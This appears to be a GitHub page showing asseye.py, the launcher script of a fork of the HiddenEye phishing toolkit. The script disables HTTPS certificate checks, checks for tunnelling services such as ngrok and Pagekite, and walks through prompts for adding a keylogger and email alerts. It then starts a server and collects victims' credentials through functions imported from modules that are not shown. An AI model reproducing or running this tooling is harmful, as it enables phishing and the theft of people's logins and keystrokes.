forked from dedshit/Asseye
-
Notifications
You must be signed in to change notification settings - Fork 0
/
asseye.py
54 lines (45 loc) · 1.3 KB
/
asseye.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#!/usr/bin/python3
#
# HiddenEye by https://github.com/DarkSecDevelopers
#
from Defs.Languages import *
from Defs.Actions import *
from Defs.Configurations import *
from Defs.Checks import *
import multiprocessing
import gettext
import sys
import ssl
from os import system, environ
if(not environ.get('PYTHONHTTPSVERIFY', "") and getattr(ssl, '_create_unverified_context', None)):
ssl._create_default_https_context = ssl._create_unverified_context
RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m'
installGetText()
languageSelector()
checkConnection()
checkPHP()
checkLocalxpose()
checkNgrok()
checkPagekite()
checkLT()
ifSettingsNotExists()
readConfig()
if __name__ == "__main__":
try:
runMainMenu()
mainMenu()
keyloggerprompt()
addingkeylogger()
cloudfarePrompt()
emailPrompt()
inputCustom()
port = selectPort()
##############
runServer(port)
selectServer(port)
multiprocessing.Process(target=runServer, args=(port,)).start()
getCredentials(port)
except KeyboardInterrupt:
port = '8080' # When Keyword Interrupt Occurs before defining Port by User. Script will use 8080 port.(Just To Remove Exception Errors)
endMessage(port)
exit()